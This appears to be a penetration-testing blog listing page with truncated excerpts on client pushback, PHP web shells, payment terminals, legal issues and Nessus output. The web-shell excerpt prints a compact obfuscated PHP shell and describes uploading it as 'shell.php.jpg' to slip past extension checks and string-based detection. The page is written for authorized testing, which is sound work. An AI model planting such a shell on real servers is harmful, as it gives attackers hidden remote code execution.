By Ed Skoudis
In this series of articles, we're looking at some of the grief that penetration testers often encounter when they deliver their results and recommendations. Our premise? You, a great pen tester, work your tail off to conduct a wonderful, high-value, technically awesome pen test. The result? Target system personnel vomit all over your findings, push back on your recommendation, and just plain don't see the value of what you've done. The series, which began with article one here, focuses on practical tips you can use to avoid such situations up front, or, if they do occur later on, methods for defusing the situation and demonstrating the real value you are providing.
Article 1 in the series
[In this article, the inimitable Tim Medin has some fun with PHP web shells, and merges together some clever ideas for interacting with them in a rather stealthier fashion using some Python kung fu! --Ed.]
By: Tim Medin
Here is the scenario: you have a server that allows you to upload an avatar. The site makes sure that the file ends with .jpg, .png, or .gif. Being the sneaky bugger you are (as a professional penetration tester operating within your scope and rules of engagement, naturally), you upload a file named shell.php.jpg, containing this delightful gem:
<?php @extract($_REQUEST); @die ($ctime($atime)); ?>
This file passes the extention check, but since it contains .php in the filename, many systems will execute it as a script. Also, this shell
doesn't include the telltale "/bin/sh", "shell_exec", or "system" strings and it looks like some sort of ...
[Editor's Note: Here is a super useful how-to guide for penetration testing payment terminals by Miika Turkia. Given recent breach news headlines, payment terminals are getting much more security scrutiny. Bad guys are exploiting and undermining them, so we as penetration testers need skills to be able to properly evaluate the security stance of these payment devices. Miika delivers by providing step-by-step instructions for evaluating the security of payment terminals. And, furthermore, his suggestions and insights go beyond payment terminals as well, revealing some strategies and tactics we can use in all kinds of penetration testing. Well done, Miika! --Ed.]
By: Miika Turkia
There is plentitude of payment terminals out there and the design principles vary quite a bit. The ones I have run into in Finland appear to be tightly secured with no attack surface. At first glance, that is. These generally open only outbound connections and use SSL
[Editor's Note: Here is a great article by John Strand about a topic that is sometimes difficult for pen testers: interacting with lawyers. But, John engages the topic in his signature fun, quirky, and highly informative way that provides practical insights into how to keep yourself safe and legal when dealing with some sticky issues in penetration testing. Nice work, John! --Ed.]
By: John Strand
Ed absolutely loves sharing the various challenges of professional penetration testers. We have had a couple of instances here at BHIS where we have had to walk away from contracts because lawyers have gotten far too involved in some of our contracts. So, just a small bit of background before we delve into the insane antics of various wielders of legal might.
We have had a couple of contracts at BHIS where we had to move to a no bid position, effectively walking away. It is a tough place to find your company. But, as professional penetration testers, we
[Editor's note: Here's a really nice article by Kevin Fiscus on a tool that'll help you analyze and manage a great deal of Nessus vulnerability scanner output. This is really helpful, cool stuff! Thanks, Kevin. --Ed.]
By Kevin Fiscus
Doing really good, high-value penetration testing is hard. You have to start with a solid, repeatable methodology on which you build a process implemented via tools and techniques. It is a technical endeavor that is, more often than not, remarkably creative. But, to do it well, you need to understand hacker techniques, cyber defense, protocols, packets, and even people. Sometimes, however, basic logistics get in the way. The problem, in many cases, is that the tools are simply too good, or rather, they give too much information but lack a particularly effective way for a penetration tester to use that information. Case in point: Nessus.
Nessus is a fantastic vulnerability scanner. It has the capability to perform both